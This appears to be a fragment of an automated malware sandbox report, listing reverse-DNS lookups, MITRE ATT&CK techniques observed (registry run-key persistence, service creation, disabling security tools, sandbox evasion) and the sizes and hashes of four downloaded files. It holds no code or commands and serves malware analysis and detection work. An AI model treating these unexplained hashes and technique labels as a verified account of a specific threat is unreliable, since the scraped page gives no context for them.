71 B 133 B 1 1
DNS Request
155.5.21.104.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5dceb05bdd62c6c55ab493ccd4d6ca445
SHA1236ca65f1dbfdc4a06140af7871cd4aa8d2ba1d1
SHA256e293319a6bb1415044af45cf66026b591dc5f72c8e83c39e35af8c5e6579c7e5
SHA51259d9ea396546a2b8ca2de08a791f7954c1286837c6effa24ec858f79af0464c4e20136bdc7d7acb7655e2403e1377fe3615b9d52bc75bc9bb8161007922783c9
-
Filesize
2.1MB
MD518c1fe0a3db9ac8cf9bae44f3d261a2c
SHA1cd3a1f06db593e00e03a43bf2ba1732897c94721
SHA256d33bf5ccd141c26d9e218fb573b078cdcd54eb890d2a32306a0eea649750aad8
SHA51260f9cc29f296a828828d278512128ceadc90618cc204774539037293c628018c5d1dfb9d5ced3819209c644116a9cf1b4bb0f7b5b680d45aa779c42fb5010735
-
Filesize
2.7MB
MD50388e2b7bda529ad2e2c828e347c50ff
SHA11810d53c0c9a63e27bd0d41b1dfd0ad92910e8e0
SHA25652e24f63eb5333c50be7274f75f8bd2672abbebacded171bb597f7a941f80c3a
SHA512d7120812ac04c355cafee1daad4d0599ce181f6f29017ba61654ba22295449e5fb1cadd19b175a6cb57045e3e4832cdb6056f0ae5788bd1534e6bc13275bb84b
-
Filesize
3.1MB
MD574ba48529515c95320f4a86fc42fc668
SHA1c33b2b0c5e43e5ac274206ae964cf85bb8718048
SHA256766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa
SHA51216f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8